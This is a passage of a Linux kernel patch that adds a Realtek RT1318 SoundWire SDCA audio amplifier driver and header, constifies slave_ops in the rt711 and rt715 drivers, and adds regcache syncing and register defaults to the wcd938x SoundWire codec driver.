++	prop->src_dpn_prop = devm_kcalloc(&slave->dev, nval,
++		sizeof(*prop->src_dpn_prop), GFP_KERNEL);
++	if (!prop->src_dpn_prop)
++		return -ENOMEM;
++
++	i = 0;
++	dpn = prop->src_dpn_prop;
++	addr = prop->source_ports;
++	for_each_set_bit(bit, &addr, 32) {
++		dpn[i].num = bit;
++		dpn[i].type = SDW_DPN_FULL;
++		dpn[i].simple_ch_prep_sm = true;
++		dpn[i].ch_prep_timeout = 10;
++		i++;
++	}
++
++	/* do this again for sink now */
++	nval = hweight32(prop->sink_ports);
++	prop->sink_dpn_prop = devm_kcalloc(&slave->dev, nval,
++		sizeof(*prop->sink_dpn_prop), GFP_KERNEL);
++	if (!prop->sink_dpn_prop)
++		return -ENOMEM;
++
++	j = 0;
++	dpn = prop->sink_dpn_prop;
++	addr = prop->sink_ports;
++	for_each_set_bit(bit, &addr, 32) {
++		dpn[j].num = bit;
++		dpn[j].type = SDW_DPN_FULL;
++		dpn[j].simple_ch_prep_sm = true;
++		dpn[j].ch_prep_timeout = 10;
++		j++;
++	}
++
++	/* set the timeout values */
++	prop->clk_stop_timeout = 20;
++
++	return 0;
++}
++
++static int rt1318_io_init(struct device *dev, struct sdw_slave *slave)
++{
++	struct rt1318_sdw_priv *rt1318 = dev_get_drvdata(dev);
++
++	if (rt1318->hw_init)
++		return 0;
++
++	if (rt1318->first_hw_init) {
++		regcache_cache_only(rt1318->regmap, false);
++		regcache_cache_bypass(rt1318->regmap, true);
++	} else {
++		/*
++		 * PM runtime is only enabled when a Slave reports as Attached
++		 */
++
++		/* set autosuspend parameters */
++		pm_runtime_set_autosuspend_delay(&slave->dev, 3000);
++		pm_runtime_use_autosuspend(&slave->dev);
++
++		/* update count of parent 'active' children */
++		pm_runtime_set_active(&slave->dev);
++
++		/* make sure the device does not suspend immediately */
++		pm_runtime_mark_last_busy(&slave->dev);
++
++		pm_runtime_enable(&slave->dev);
++	}
++
++	pm_runtime_get_noresume(&slave->dev);
++
++	/* blind write */
++	regmap_multi_reg_write(rt1318->regmap, rt1318_blind_write,
++		ARRAY_SIZE(rt1318_blind_write));
++
++	if (rt1318->first_hw_init) {
++		regcache_cache_bypass(rt1318->regmap, false);
++		regcache_mark_dirty(rt1318->regmap);
++	}
++
++	/* Mark Slave initialization complete */
++	rt1318->first_hw_init = true;
++	rt1318->hw_init = true;
++
++	pm_runtime_mark_last_busy(&slave->dev);
++	pm_runtime_put_autosuspend(&slave->dev);
++
++	dev_dbg(&slave->dev, "%s hw_init complete\n", __func__);
++	return 0;
++}
++
++static int rt1318_update_status(struct sdw_slave *slave,
++					enum sdw_slave_status status)
++{
++	struct  rt1318_sdw_priv *rt1318 = dev_get_drvdata(&slave->dev);
++
++	/* Update the status */
++	rt1318->status = status;
++
++	if (status == SDW_SLAVE_UNATTACHED)
++		rt1318->hw_init = false;
++
++	/*
++	 * Perform initialization only if slave status is present and
++	 * hw_init flag is false
++	 */
++	if (rt1318->hw_init || rt1318->status != SDW_SLAVE_ATTACHED)
++		return 0;
++
++	/* perform I/O transfers required for Slave initialization */
++	return rt1318_io_init(&slave->dev, slave);
++}
++
++static int rt1318_classd_event(struct snd_soc_dapm_widget *w,
++	struct snd_kcontrol *kcontrol, int event)
++{
++	struct snd_soc_component *component =
++		snd_soc_dapm_to_component(w->dapm);
++	struct rt1318_sdw_priv *rt1318 = snd_soc_component_get_drvdata(component);
++	unsigned char ps0 = 0x0, ps3 = 0x3;
++
++	switch (event) {
++	case SND_SOC_DAPM_POST_PMU:
++		regmap_write(rt1318->regmap,
++			SDW_SDCA_CTL(FUNC_NUM_SMART_AMP, RT1318_SDCA_ENT_PDE23,
++				RT1318_SDCA_CTL_REQ_POWER_STATE, 0),
++				ps0);
++		break;
++	case SND_SOC_DAPM_PRE_PMD:
++		regmap_write(rt1318->regmap,
++			SDW_SDCA_CTL(FUNC_NUM_SMART_AMP, RT1318_SDCA_ENT_PDE23,
++				RT1318_SDCA_CTL_REQ_POWER_STATE, 0),
++				ps3);
++		break;
++
++	default:
++		break;
++	}
++
++	return 0;
++}
++
++static const char * const rt1318_rx_data_ch_select[] = {
++	"L,R",
++	"L,L",
++	"L,R",
++	"L,L+R",
++	"R,L",
++	"R,R",
++	"R,L+R",
++	"L+R,L",
++	"L+R,R",
++	"L+R,L+R",
++};
++
++static SOC_ENUM_SINGLE_DECL(rt1318_rx_data_ch_enum,
++	SDW_SDCA_CTL(FUNC_NUM_SMART_AMP, RT1318_SDCA_ENT_UDMPU21, RT1318_SDCA_CTL_UDMPU_CLUSTER, 0), 0,
++	rt1318_rx_data_ch_select);
++
++static const struct snd_kcontrol_new rt1318_snd_controls[] = {
++
++	/* UDMPU Cluster Selection */
++	SOC_ENUM("RX Channel Select", rt1318_rx_data_ch_enum),
++};
++
++static const struct snd_kcontrol_new rt1318_sto_dac =
++	SOC_DAPM_DOUBLE_R("Switch",
++		SDW_SDCA_CTL(FUNC_NUM_SMART_AMP, RT1318_SDCA_ENT_FU21, RT1318_SDCA_CTL_FU_MUTE, CH_L),
++		SDW_SDCA_CTL(FUNC_NUM_SMART_AMP, RT1318_SDCA_ENT_FU21, RT1318_SDCA_CTL_FU_MUTE, CH_R),
++		0, 1, 1);
++
++static const struct snd_soc_dapm_widget rt1318_dapm_widgets[] = {
++	/* Audio Interface */
++	SND_SOC_DAPM_AIF_IN("DP1RX", "DP1 Playback", 0, SND_SOC_NOPM, 0, 0),
++	SND_SOC_DAPM_AIF_OUT("DP2TX", "DP2 Capture", 0, SND_SOC_NOPM, 0, 0),
++
++	/* Digital Interface */
++	SND_SOC_DAPM_SWITCH("DAC", SND_SOC_NOPM, 0, 0, &rt1318_sto_dac),
++
++	/* Output */
++	SND_SOC_DAPM_PGA_E("CLASS D", SND_SOC_NOPM, 0, 0, NULL, 0,
++		rt1318_classd_event, SND_SOC_DAPM_PRE_PMD | SND_SOC_DAPM_POST_PMU),
++	SND_SOC_DAPM_OUTPUT("SPOL"),
++	SND_SOC_DAPM_OUTPUT("SPOR"),
++	/* Input */
++	SND_SOC_DAPM_PGA("FB Data", SND_SOC_NOPM, 0, 0, NULL, 0),
++	SND_SOC_DAPM_SIGGEN("FB Gen"),
++};
++
++static const struct snd_soc_dapm_route rt1318_dapm_routes[] = {
++	{ "DAC", "Switch", "DP1RX" },
++	{ "CLASS D", NULL, "DAC" },
++	{ "SPOL", NULL, "CLASS D" },
++	{ "SPOR", NULL, "CLASS D" },
++
++	{ "FB Data", NULL, "FB Gen" },
++	{ "DP2TX", NULL, "FB Data" },
++};
++
++static int rt1318_set_sdw_stream(struct snd_soc_dai *dai, void *sdw_stream,
++				int direction)
++{
++	struct sdw_stream_data *stream;
++
++	if (!sdw_stream)
++		return 0;
++
++	stream = kzalloc(sizeof(*stream), GFP_KERNEL);
++	if (!stream)
++		return -ENOMEM;
++
++	stream->sdw_stream = sdw_stream;
++
++	/* Use tx_mask or rx_mask to configure stream tag and set dma_data */
++	if (direction == SNDRV_PCM_STREAM_PLAYBACK)
++		dai->playback_dma_data = stream;
++	else
++		dai->capture_dma_data = stream;
++
++	return 0;
++}
++
++static void rt1318_sdw_shutdown(struct snd_pcm_substream *substream,
++				struct snd_soc_dai *dai)
++{
++	struct sdw_stream_data *stream;
++
++	stream = snd_soc_dai_get_dma_data(dai, substream);
++	snd_soc_dai_set_dma_data(dai, substream, NULL);
++	kfree(stream);
++}
++
++static int rt1318_sdw_hw_params(struct snd_pcm_substream *substream,
++	struct snd_pcm_hw_params *params, struct snd_soc_dai *dai)
++{
++	struct snd_soc_component *component = dai->component;
++	struct rt1318_sdw_priv *rt1318 =
++		snd_soc_component_get_drvdata(component);
++	struct sdw_stream_config stream_config;
++	struct sdw_port_config port_config;
++	enum sdw_data_direction direction;
++	struct sdw_stream_data *stream;
++	int retval, port, num_channels, ch_mask;
++	unsigned int sampling_rate;
++
++	dev_dbg(dai->dev, "%s %s", __func__, dai->name);
++	stream = snd_soc_dai_get_dma_data(dai, substream);
++
++	if (!stream)
++		return -EINVAL;
++
++	if (!rt1318->sdw_slave)
++		return -EINVAL;
++
++	/* SoundWire specific configuration */
++	/* port 1 for playback */
++	if (substream->stream == SNDRV_PCM_STREAM_PLAYBACK) {
++		direction = SDW_DATA_DIR_RX;
++		port = 1;
++	} else {
++		direction = SDW_DATA_DIR_TX;
++		port = 2;
++	}
++
++	num_channels = params_channels(params);
++	ch_mask = (1 << num_channels) - 1;
++
++	stream_config.frame_rate = params_rate(params);
++	stream_config.ch_count = num_channels;
++	stream_config.bps = snd_pcm_format_width(params_format(params));
++	stream_config.direction = direction;
++
++	port_config.ch_mask = ch_mask;
++	port_config.num = port;
++
++	retval = sdw_stream_add_slave(rt1318->sdw_slave, &stream_config,
++				&port_config, 1, stream->sdw_stream);
++	if (retval) {
++		dev_err(dai->dev, "Unable to configure port\n");
++		return retval;
++	}
++
++	/* sampling rate configuration */
++	switch (params_rate(params)) {
++	case 16000:
++		sampling_rate = RT1318_SDCA_RATE_16000HZ;
++		break;
++	case 32000:
++		sampling_rate = RT1318_SDCA_RATE_32000HZ;
++		break;
++	case 44100:
++		sampling_rate = RT1318_SDCA_RATE_44100HZ;
++		break;
++	case 48000:
++		sampling_rate = RT1318_SDCA_RATE_48000HZ;
++		break;
++	case 96000:
++		sampling_rate = RT1318_SDCA_RATE_96000HZ;
++		break;
++	case 192000:
++		sampling_rate = RT1318_SDCA_RATE_192000HZ;
++		break;
++	default:
++		dev_err(component->dev, "Rate %d is not supported\n",
++			params_rate(params));
++		return -EINVAL;
++	}
++
++	/* set sampling frequency */
++	regmap_write(rt1318->regmap,
++		SDW_SDCA_CTL(FUNC_NUM_SMART_AMP, RT1318_SDCA_ENT_CS21, RT1318_SDCA_CTL_SAMPLE_FREQ_INDEX, 0),
++		sampling_rate);
++
++	return 0;
++}
++
++static int rt1318_sdw_pcm_hw_free(struct snd_pcm_substream *substream,
++				struct snd_soc_dai *dai)
++{
++	struct snd_soc_component *component = dai->component;
++	struct rt1318_sdw_priv *rt1318 =
++		snd_soc_component_get_drvdata(component);
++	struct sdw_stream_data *stream =
++		snd_soc_dai_get_dma_data(dai, substream);
++
++	if (!rt1318->sdw_slave)
++		return -EINVAL;
++
++	sdw_stream_remove_slave(rt1318->sdw_slave, stream->sdw_stream);
++	return 0;
++}
++
++/*
++ * slave_ops: callbacks for get_clock_stop_mode, clock_stop and
++ * port_prep are not defined for now
++ */
++static const struct sdw_slave_ops rt1318_slave_ops = {
++	.read_prop = rt1318_read_prop,
++	.update_status = rt1318_update_status,
++};
++
++static int rt1318_sdw_component_probe(struct snd_soc_component *component)
++{
++	int ret;
++	struct rt1318_sdw_priv *rt1318 = snd_soc_component_get_drvdata(component);
++
++	rt1318->component = component;
++
++	ret = pm_runtime_resume(component->dev);
++	dev_dbg(&rt1318->sdw_slave->dev, "%s pm_runtime_resume, ret=%d", __func__, ret);
++	if (ret < 0 && ret != -EACCES)
++		return ret;
++
++	return 0;
++}
++
++static const struct snd_soc_component_driver soc_component_sdw_rt1318 = {
++	.probe = rt1318_sdw_component_probe,
++	.controls = rt1318_snd_controls,
++	.num_controls = ARRAY_SIZE(rt1318_snd_controls),
++	.dapm_widgets = rt1318_dapm_widgets,
++	.num_dapm_widgets = ARRAY_SIZE(rt1318_dapm_widgets),
++	.dapm_routes = rt1318_dapm_routes,
++	.num_dapm_routes = ARRAY_SIZE(rt1318_dapm_routes),
++	.endianness = 1,
++};
++
++static const struct snd_soc_dai_ops rt1318_aif_dai_ops = {
++	.hw_params = rt1318_sdw_hw_params,
++	.hw_free	= rt1318_sdw_pcm_hw_free,
++	.set_stream	= rt1318_set_sdw_stream,
++	.shutdown	= rt1318_sdw_shutdown,
++};
++
++#define RT1318_STEREO_RATES (SNDRV_PCM_RATE_16000 | SNDRV_PCM_RATE_32000 | SNDRV_PCM_RATE_44100 | \
++	SNDRV_PCM_RATE_48000 | SNDRV_PCM_RATE_96000 | SNDRV_PCM_RATE_192000)
++#define RT1318_FORMATS (SNDRV_PCM_FMTBIT_S16_LE | SNDRV_PCM_FMTBIT_S24_LE | \
++	SNDRV_PCM_FMTBIT_S32_LE)
++
++static struct snd_soc_dai_driver rt1318_sdw_dai[] = {
++	{
++		.name = "rt1318-aif",
++		.playback = {
++			.stream_name = "DP1 Playback",
++			.channels_min = 1,
++			.channels_max = 2,
++			.rates = RT1318_STEREO_RATES,
++			.formats = RT1318_FORMATS,
++		},
++		.capture = {
++			.stream_name = "DP2 Capture",
++			.channels_min = 1,
++			.channels_max = 2,
++			.rates = RT1318_STEREO_RATES,
++			.formats = RT1318_FORMATS,
++		},
++		.ops = &rt1318_aif_dai_ops,
++	},
++};
++
++static int rt1318_sdw_init(struct device *dev, struct regmap *regmap,
++				struct sdw_slave *slave)
++{
++	struct rt1318_sdw_priv *rt1318;
++	int ret;
++
++	rt1318 = devm_kzalloc(dev, sizeof(*rt1318), GFP_KERNEL);
++	if (!rt1318)
++		return -ENOMEM;
++
++	dev_set_drvdata(dev, rt1318);
++	rt1318->sdw_slave = slave;
++	rt1318->regmap = regmap;
++
++	/*
++	 * Mark hw_init to false
++	 * HW init will be performed when device reports present
++	 */
++	rt1318->hw_init = false;
++	rt1318->first_hw_init = false;
++
++	ret =  devm_snd_soc_register_component(dev,
++				&soc_component_sdw_rt1318,
++				rt1318_sdw_dai,
++				ARRAY_SIZE(rt1318_sdw_dai));
++
++	dev_dbg(&slave->dev, "%s\n", __func__);
++
++	return ret;
++}
++
++static int rt1318_sdw_probe(struct sdw_slave *slave,
++				const struct sdw_device_id *id)
++{
++	struct regmap *regmap;
++
++	/* Regmap Initialization */
++	regmap = devm_regmap_init_sdw(slave, &rt1318_sdw_regmap);
++	if (IS_ERR(regmap))
++		return PTR_ERR(regmap);
++
++	return rt1318_sdw_init(&slave->dev, regmap, slave);
++}
++
++static int rt1318_sdw_remove(struct sdw_slave *slave)
++{
++	struct rt1318_sdw_priv *rt1318 = dev_get_drvdata(&slave->dev);
++
++	if (rt1318->first_hw_init)
++		pm_runtime_disable(&slave->dev);
++
++	return 0;
++}
++
++static const struct sdw_device_id rt1318_id[] = {
++	SDW_SLAVE_ENTRY_EXT(0x025d, 0x1318, 0x3, 0x1, 0),
++	{},
++};
++MODULE_DEVICE_TABLE(sdw, rt1318_id);
++
++static int __maybe_unused rt1318_dev_suspend(struct device *dev)
++{
++	struct rt1318_sdw_priv *rt1318 = dev_get_drvdata(dev);
++
++	if (!rt1318->hw_init)
++		return 0;
++
++	regcache_cache_only(rt1318->regmap, true);
++	return 0;
++}
++
++#define RT1318_PROBE_TIMEOUT 5000
++
++static int __maybe_unused rt1318_dev_resume(struct device *dev)
++{
++	struct sdw_slave *slave = dev_to_sdw_dev(dev);
++	struct rt1318_sdw_priv *rt1318 = dev_get_drvdata(dev);
++	unsigned long time;
++
++	if (!rt1318->first_hw_init)
++		return 0;
++
++	if (!slave->unattach_request)
++		goto regmap_sync;
++
++	time = wait_for_completion_timeout(&slave->initialization_complete,
++				msecs_to_jiffies(RT1318_PROBE_TIMEOUT));
++	if (!time) {
++		dev_err(&slave->dev, "Initialization not complete, timed out\n");
++		return -ETIMEDOUT;
++	}
++
++regmap_sync:
++	slave->unattach_request = 0;
++	regcache_cache_only(rt1318->regmap, false);
++	regcache_sync(rt1318->regmap);
++
++	return 0;
++}
++
++static const struct dev_pm_ops rt1318_pm = {
++	SET_SYSTEM_SLEEP_PM_OPS(rt1318_dev_suspend, rt1318_dev_resume)
++	SET_RUNTIME_PM_OPS(rt1318_dev_suspend, rt1318_dev_resume, NULL)
++};
++
++static struct sdw_driver rt1318_sdw_driver = {
++	.driver = {
++		.name = "rt1318-sdca",
++		.owner = THIS_MODULE,
++		.pm = &rt1318_pm,
++	},
++	.probe = rt1318_sdw_probe,
++	.remove = rt1318_sdw_remove,
++	.ops = &rt1318_slave_ops,
++	.id_table = rt1318_id,
++};
++module_sdw_driver(rt1318_sdw_driver);
++
++MODULE_DESCRIPTION("ASoC RT1318 driver SDCA SDW");
++MODULE_AUTHOR("Shuming Fan <shumingf@realtek.com>");
++MODULE_LICENSE("GPL");
+diff --git a/sound/soc/codecs/rt1318-sdw.h b/sound/soc/codecs/rt1318-sdw.h
+new file mode 100644
+index 0000000000000..4d7ac9c4bd8de
+--- /dev/null
++++ b/sound/soc/codecs/rt1318-sdw.h
+@@ -0,0 +1,101 @@
++/* SPDX-License-Identifier: GPL-2.0-only */
++/*
++ * rt1318-sdw.h -- RT1318 SDCA ALSA SoC audio driver header
++ *
++ * Copyright(c) 2022 Realtek Semiconductor Corp.
++ */
++
++#ifndef __RT1318_SDW_H__
++#define __RT1318_SDW_H__
++
++#include <linux/regmap.h>
++#include <linux/soundwire/sdw.h>
++#include <linux/soundwire/sdw_type.h>
++#include <linux/soundwire/sdw_registers.h>
++#include <sound/soc.h>
++
++/* imp-defined registers */
++#define RT1318_SAPU_SM 0x3203
++
++#define R1318_TCON	0xc203
++#define R1318_TCON_RELATED_1	0xc206
++
++#define R1318_SPK_TEMPERATRUE_PROTECTION_0	0xdb00
++#define R1318_SPK_TEMPERATRUE_PROTECTION_L_4	0xdb08
++#define R1318_SPK_TEMPERATRUE_PROTECTION_R_4	0xdd08
++
++#define R1318_SPK_TEMPERATRUE_PROTECTION_L_6	0xdb12
++#define R1318_SPK_TEMPERATRUE_PROTECTION_R_6	0xdd12
++
++#define RT1318_INIT_RECIPROCAL_REG_L_24		0xdbb5
++#define RT1318_INIT_RECIPROCAL_REG_L_23_16	0xdbb6
++#define RT1318_INIT_RECIPROCAL_REG_L_15_8	0xdbb7
++#define RT1318_INIT_RECIPROCAL_REG_L_7_0	0xdbb8
++#define RT1318_INIT_RECIPROCAL_REG_R_24		0xddb5
++#define RT1318_INIT_RECIPROCAL_REG_R_23_16	0xddb6
++#define RT1318_INIT_RECIPROCAL_REG_R_15_8	0xddb7
++#define RT1318_INIT_RECIPROCAL_REG_R_7_0	0xddb8
++
++#define RT1318_INIT_R0_RECIPROCAL_SYN_L_24 0xdbc5
++#define RT1318_INIT_R0_RECIPROCAL_SYN_L_23_16 0xdbc6
++#define RT1318_INIT_R0_RECIPROCAL_SYN_L_15_8 0xdbc7
++#define RT1318_INIT_R0_RECIPROCAL_SYN_L_7_0 0xdbc8
++#define RT1318_INIT_R0_RECIPROCAL_SYN_R_24 0xddc5
++#define RT1318_INIT_R0_RECIPROCAL_SYN_R_23_16 0xddc6
++#define RT1318_INIT_R0_RECIPROCAL_SYN_R_15_8 0xddc7
++#define RT1318_INIT_R0_RECIPROCAL_SYN_R_7_0 0xddc8
++
++#define RT1318_R0_COMPARE_FLAG_L	0xdb35
++#define RT1318_R0_COMPARE_FLAG_R	0xdd35
++
++#define RT1318_STP_INITIAL_RS_TEMP_H 0xdd93
++#define RT1318_STP_INITIAL_RS_TEMP_L 0xdd94
++
++/* RT1318 SDCA Control - function number */
++#define FUNC_NUM_SMART_AMP 0x04
++
++/* RT1318 SDCA entity */
++#define RT1318_SDCA_ENT_PDE23 0x31
++#define RT1318_SDCA_ENT_XU24 0x24
++#define RT1318_SDCA_ENT_FU21 0x03
++#define RT1318_SDCA_ENT_UDMPU21 0x02
++#define RT1318_SDCA_ENT_CS21 0x21
++#define RT1318_SDCA_ENT_SAPU 0x29
++
++/* RT1318 SDCA control */
++#define RT1318_SDCA_CTL_SAMPLE_FREQ_INDEX 0x10
++#define RT1318_SDCA_CTL_REQ_POWER_STATE 0x01
++#define RT1318_SDCA_CTL_FU_MUTE 0x01
++#define RT1318_SDCA_CTL_FU_VOLUME 0x02
++#define RT1318_SDCA_CTL_UDMPU_CLUSTER 0x10
++#define RT1318_SDCA_CTL_SAPU_PROTECTION_MODE 0x10
++#define RT1318_SDCA_CTL_SAPU_PROTECTION_STATUS 0x11
++
++/* RT1318 SDCA channel */
++#define CH_L 0x01
++#define CH_R 0x02
++
++/* sample frequency index */
++#define RT1318_SDCA_RATE_16000HZ		0x04
++#define RT1318_SDCA_RATE_32000HZ		0x07
++#define RT1318_SDCA_RATE_44100HZ		0x08
++#define RT1318_SDCA_RATE_48000HZ		0x09
++#define RT1318_SDCA_RATE_96000HZ		0x0b
++#define RT1318_SDCA_RATE_192000HZ		0x0d
++
++
++struct rt1318_sdw_priv {
++	struct snd_soc_component *component;
++	struct regmap *regmap;
++	struct sdw_slave *sdw_slave;
++	enum sdw_slave_status status;
++	struct sdw_bus_params params;
++	bool hw_init;
++	bool first_hw_init;
++};
++
++struct sdw_stream_data {
++	struct sdw_stream_runtime *sdw_stream;
++};
++
++#endif /* __RT1318_SDW_H__ */
+diff --git a/sound/soc/codecs/rt711-sdca-sdw.c b/sound/soc/codecs/rt711-sdca-sdw.c
+index 88a8392a58edb..e23cec4c457de 100644
+--- a/sound/soc/codecs/rt711-sdca-sdw.c
++++ b/sound/soc/codecs/rt711-sdca-sdw.c
+@@ -338,7 +338,7 @@ io_error:
+ 	return ret;
+ }
+ 
+-static struct sdw_slave_ops rt711_sdca_slave_ops = {
++static const struct sdw_slave_ops rt711_sdca_slave_ops = {
+ 	.read_prop = rt711_sdca_read_prop,
+ 	.interrupt_callback = rt711_sdca_interrupt_callback,
+ 	.update_status = rt711_sdca_update_status,
+diff --git a/sound/soc/codecs/rt715-sdca-sdw.c b/sound/soc/codecs/rt715-sdca-sdw.c
+index c54ecf3e69879..38a82e4e2f952 100644
+--- a/sound/soc/codecs/rt715-sdca-sdw.c
++++ b/sound/soc/codecs/rt715-sdca-sdw.c
+@@ -172,7 +172,7 @@ static int rt715_sdca_read_prop(struct sdw_slave *slave)
+ 	return 0;
+ }
+ 
+-static struct sdw_slave_ops rt715_sdca_slave_ops = {
++static const struct sdw_slave_ops rt715_sdca_slave_ops = {
+ 	.read_prop = rt715_sdca_read_prop,
+ 	.update_status = rt715_sdca_update_status,
+ };
+diff --git a/sound/soc/codecs/wcd938x-sdw.c b/sound/soc/codecs/wcd938x-sdw.c
+index 1bf3c06a2b622..402286dfaea44 100644
+--- a/sound/soc/codecs/wcd938x-sdw.c
++++ b/sound/soc/codecs/wcd938x-sdw.c
+@@ -161,6 +161,14 @@ EXPORT_SYMBOL_GPL(wcd938x_sdw_set_sdw_stream);
+ static int wcd9380_update_status(struct sdw_slave *slave,
+ 				 enum sdw_slave_status status)
+ {
++	struct wcd938x_sdw_priv *wcd = dev_get_drvdata(&slave->dev);
++
++	if (wcd->regmap && (status == SDW_SLAVE_ATTACHED)) {
++		/* Write out any cached changes that happened between probe and attach */
++		regcache_cache_only(wcd->regmap, false);
++		return regcache_sync(wcd->regmap);
++	}
++
+ 	return 0;
+ }
+ 
+@@ -177,21 +185,1015 @@ static int wcd9380_interrupt_callback(struct sdw_slave *slave,
+ {
+ 	struct wcd938x_sdw_priv *wcd = dev_get_drvdata(&slave->dev);
+ 	struct irq_domain *slave_irq = wcd->slave_irq;
+-	struct regmap *regmap = dev_get_regmap(&slave->dev, NULL);
+ 	u32 sts1, sts2, sts3;
+ 
+ 	do {
+ 		handle_nested_irq(irq_find_mapping(slave_irq, 0));
+-		regmap_read(regmap, WCD938X_DIGITAL_INTR_STATUS_0, &sts1);
+-		regmap_read(regmap, WCD938X_DIGITAL_INTR_STATUS_1, &sts2);
+-		regmap_read(regmap, WCD938X_DIGITAL_INTR_STATUS_2, &sts3);
++		regmap_read(wcd->regmap, WCD938X_DIGITAL_INTR_STATUS_0, &sts1);
++		regmap_read(wcd->regmap, WCD938X_DIGITAL_INTR_STATUS_1, &sts2);
++		regmap_read(wcd->regmap, WCD938X_DIGITAL_INTR_STATUS_2, &sts3);
+ 
+ 	} while (sts1 || sts2 || sts3);
+ 
+ 	return IRQ_HANDLED;
+ }
+ 
+-static struct sdw_slave_ops wcd9380_slave_ops = {
++static const struct reg_default wcd938x_defaults[] = {
++	{WCD938X_ANA_PAGE_REGISTER,                            0x00},
++	{WCD938X_ANA_BIAS,                                     0x00},
++	{WCD938X_ANA_RX_SUPPLIES,                              0x00},
++	{WCD938X_ANA_HPH,                                      0x0C},
++	{WCD938X_ANA_EAR,                                      0x00},
++	{WCD938X_ANA_EAR_COMPANDER_CTL,                        0x02},
++	{WCD938X_ANA_TX_CH1,                                   0x20},
++	{WCD938X_ANA_TX_CH2,                                   0x00},
++	{WCD938X_ANA_TX_CH3,                                   0x20},
++	{WCD938X_ANA_TX_CH4,                                   0x00},
++	{WCD938X_ANA_MICB1_MICB2_DSP_EN_LOGIC,                 0x00},
++	{WCD938X_ANA_MICB3_DSP_EN_LOGIC,                       0x00},
++	{WCD938X_ANA_MBHC_MECH,                                0x39},
++	{WCD938X_ANA_MBHC_ELECT,                               0x08},
++	{WCD938X_ANA_MBHC_ZDET,                                0x00},
++	{WCD938X_ANA_MBHC_RESULT_1,                            0x00},
++	{WCD938X_ANA_MBHC_RESULT_2,                            0x00},
++	{WCD938X_ANA_MBHC_RESULT_3,                            0x00},
++	{WCD938X_ANA_MBHC_BTN0,                                0x00},
++	{WCD938X_ANA_MBHC_BTN1,                                0x10},
++	{WCD938X_ANA_MBHC_BTN2,                                0x20},
++	{WCD938X_ANA_MBHC_BTN3,                                0x30},
++	{WCD938X_ANA_MBHC_BTN4,                                0x40},
++	{WCD938X_ANA_MBHC_BTN5,                                0x50},
++	{WCD938X_ANA_MBHC_BTN6,                                0x60},
++	{WCD938X_ANA_MBHC_BTN7,                                0x70},
++	{WCD938X_ANA_MICB1,                                    0x10},
++	{WCD938X_ANA_MICB2,                                    0x10},
++	{WCD938X_ANA_MICB2_RAMP,                               0x00},
++	{WCD938X_ANA_MICB3,                                    0x10},
++	{WCD938X_ANA_MICB4,                                    0x10},
++	{WCD938X_BIAS_CTL,                                     0x2A},
++	{WCD938X_BIAS_VBG_FINE_ADJ,                            0x55},
++	{WCD938X_LDOL_VDDCX_ADJUST,                            0x01},
++	{WCD938X_LDOL_DISABLE_LDOL,                            0x00},
++	{WCD938X_MBHC_CTL_CLK,                                 0x00},
++	{WCD938X_MBHC_CTL_ANA,                                 0x00},
++	{WCD938X_MBHC_CTL_SPARE_1,                             0x00},
++	{WCD938X_MBHC_CTL_SPARE_2,                             0x00},
++	{WCD938X_MBHC_CTL_BCS,                                 0x00},
++	{WCD938X_MBHC_MOISTURE_DET_FSM_STATUS,                 0x00},
++	{WCD938X_MBHC_TEST_CTL,                                0x00},
++	{WCD938X_LDOH_MODE,                                    0x2B},
++	{WCD938X_LDOH_BIAS,                                    0x68},
++	{WCD938X_LDOH_STB_LOADS,                               0x00},
++	{WCD938X_LDOH_SLOWRAMP,                                0x50},
++	{WCD938X_MICB1_TEST_CTL_1,                             0x1A},
++	{WCD938X_MICB1_TEST_CTL_2,                             0x00},
++	{WCD938X_MICB1_TEST_CTL_3,                             0xA4},
++	{WCD938X_MICB2_TEST_CTL_1,                             0x1A},
++	{WCD938X_MICB2_TEST_CTL_2,                             0x00},
++	{WCD938X_MICB2_TEST_CTL_3,                             0x24},
++	{WCD938X_MICB3_TEST_CTL_1,                             0x1A},
++	{WCD938X_MICB3_TEST_CTL_2,                             0x00},
++	{WCD938X_MICB3_TEST_CTL_3,                             0xA4},
++	{WCD938X_MICB4_TEST_CTL_1,                             0x1A},
++	{WCD938X_MICB4_TEST_CTL_2,                             0x00},
++	{WCD938X_MICB4_TEST_CTL_3,                             0xA4},
++	{WCD938X_TX_COM_ADC_VCM,                               0x39},
++	{WCD938X_TX_COM_BIAS_ATEST,                            0xE0},
++	{WCD938X_TX_COM_SPARE1,                                0x00},
++	{WCD938X_TX_COM_SPARE2,                                0x00},
++	{WCD938X_TX_COM_TXFE_DIV_CTL,                          0x22},
++	{WCD938X_TX_COM_TXFE_DIV_START,                        0x00},
++	{WCD938X_TX_COM_SPARE3,                                0x00},
++	{WCD938X_TX_COM_SPARE4,                                0x00},
++	{WCD938X_TX_1_2_TEST_EN,                               0xCC},
++	{WCD938X_TX_1_2_ADC_IB,                                0xE9},
++	{WCD938X_TX_1_2_ATEST_REFCTL,                          0x0A},
++	{WCD938X_TX_1_2_TEST_CTL,                              0x38},
++	{WCD938X_TX_1_2_TEST_BLK_EN1,                          0xFF},
++	{WCD938X_TX_1_2_TXFE1_CLKDIV,                          0x00},
++	{WCD938X_TX_1_2_SAR2_ERR,                              0x00},
++	{WCD938X_TX_1_2_SAR1_ERR,                              0x00},
++	{WCD938X_TX_3_4_TEST_EN,                               0xCC},
++	{WCD938X_TX_3_4_ADC_IB,                                0xE9},
++	{WCD938X_TX_3_4_ATEST_REFCTL,                          0x0A},
++	{WCD938X_TX_3_4_TEST_CTL,                              0x38},
++	{WCD938X_TX_3_4_TEST_BLK_EN3,                          0xFF},
++	{WCD938X_TX_3_4_TXFE3_CLKDIV,                          0x00},
++	{WCD938X_TX_3_4_SAR4_ERR,                              0x00},
++	{WCD938X_TX_3_4_SAR3_ERR,                              0x00},
++	{WCD938X_TX_3_4_TEST_BLK_EN2,                          0xFB},
++	{WCD938X_TX_3_4_TXFE2_CLKDIV,                          0x00},
++	{WCD938X_TX_3_4_SPARE1,                                0x00},
++	{WCD938X_TX_3_4_TEST_BLK_EN4,                          0xFB},
++	{WCD938X_TX_3_4_TXFE4_CLKDIV,                          0x00},
++	{WCD938X_TX_3_4_SPARE2,                                0x00},
++	{WCD938X_CLASSH_MODE_1,                                0x40},
++	{WCD938X_CLASSH_MODE_2,                                0x3A},
++	{WCD938X_CLASSH_MODE_3,                                0x00},
++	{WCD938X_CLASSH_CTRL_VCL_1,                            0x70},
++	{WCD938X_CLASSH_CTRL_VCL_2,                            0x82},
++	{WCD938X_CLASSH_CTRL_CCL_1,                            0x31},
++	{WCD938X_CLASSH_CTRL_CCL_2,                            0x80},
